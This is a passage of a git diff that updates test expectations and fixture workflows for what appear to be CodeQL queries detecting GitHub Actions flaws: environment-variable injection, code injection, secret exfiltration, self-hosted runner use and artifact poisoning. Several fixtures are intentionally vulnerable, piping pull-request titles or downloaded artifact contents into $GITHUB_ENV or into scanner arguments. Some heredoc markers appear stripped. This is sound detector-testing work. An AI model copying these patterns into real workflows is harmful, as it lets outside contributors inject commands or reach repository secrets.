b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref new file mode 100644 index 000000000000..ba2d522c03d2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c936..f88785c38e1a 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -1,21 +1,40 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 785aaa383eb3..50cb0c40d24a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,9 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | -| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' + - uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 3fbc081a0f42..259746eaec9a 100644 --- a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,22 +1,6 @@ edges -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | nodes -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml new file mode 100644 index 000000000000..81d614e51223 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -0,0 +1,28 @@ +name: test + +on: + pull_request: + +jobs: + test1: + runs-on: [self-hosted, X64, Linux, 16c32g] + steps: + - run: cmd + test2: + runs-on: + group: my-group + labels: [self-hosted, label-1] + steps: + - run: cmd + test3: + runs-on: + - 'self-hosted' + - 'linux' + - 'x64' + - 'metal' + steps: + - run: echo "foo" + test4: + runs-on: self-hosted-azure + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml new file mode 100644 index 000000000000..243bac925994 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml @@ -0,0 +1,26 @@ +name: test + +on: + push: + +jobs: + test1: + runs-on: [self-hosted, foo] + steps: + - run: cmd + test2: + runs-on: + group: my-group + labels: [self-hosted, foo] + steps: + - run: cmd + test3: + runs-on: + - 'self-hosted' + - 'foo' + steps: + - run: cmd + test4: + runs-on: self-hosted-azure + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected new file mode 100644 index 000000000000..920a818ab351 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected @@ -0,0 +1,4 @@ +| .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner | diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref new file mode 100644 index 000000000000..43692e5ce43a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -0,0 +1,2 @@ +Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 429a4cdc0c5b..3d1df408c3b4 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -1,43 +1,43 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| 